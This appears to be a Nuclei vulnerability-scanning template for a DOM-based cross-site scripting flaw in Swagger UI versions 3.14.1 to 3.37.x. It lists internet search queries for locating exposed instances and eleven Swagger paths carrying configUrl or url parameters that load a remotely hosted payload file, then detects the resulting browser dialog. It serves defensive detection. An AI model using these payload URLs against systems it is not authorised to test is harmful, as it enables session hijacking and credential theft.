id: CVE-2025-8191

info:
  name: Swagger UI >=3.14.1 < 3.38.0 - DOM Based Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    Swagger UI versions 3.14.1 through 3.37.x are vulnerable to DOM-based Cross-Site Scripting (XSS) attacks. The vulnerability occurs when processing malicious configuration URLs that contain XSS payloads in the Swagger specification. An attacker can craft a malicious configUrl parameter that, when processed by Swagger UI, executes arbitrary JavaScript code in the victim's browser context.
  impact: |
    Attackers can craft malicious configUrl or url parameters in Swagger UI that execute arbitrary JavaScript in victims' browsers, potentially leading to session hijacking, credential theft, or account takeover when users access the malicious Swagger documentation.
  remediation: |
    Upgrade Swagger UI to version 3.38.0 or later that properly sanitizes and validates configuration URLs.
  reference:
    - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8191
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-8191
    cwe-id: CWE-79
    epss-score: 0.00678
    epss-percentile: 0.71896
    cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: smartbear
    product: swagger_ui
    shodan-query:
      - http.component:"Swagger"
      - http.component:"swagger"
      - http.favicon.hash:"-1180440057"
    fofa-query: icon_hash="-1180440057"
    zoomeye-query: app:"Swagger UI"
  tags: cve,cve2025,headless,swagger,xss,smartbear,dom-xss,vuln

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/{{swagger_path}}'
        action: navigate

      - action: waitdialog
        name: swagger_dom

    payloads:
      swagger_path:
        - 'swagger/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'swagger-ui/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'api-docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - '?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - '?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
        - 'open-api/swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - swagger_dom == true

      - type: word
        part: body
        words:
          - "swagger"
        case-insensitive: true
# digest: 490a004630440220558bbc61eb1d34bd857760542df744f9cee44bfc77a2ba3506491cfbe769357b02203d2f4399ef75c967e5460bcf74530241be01fc137cbd8b17a1060836e39eac10:922c64590222798bb761d5b6d8e72950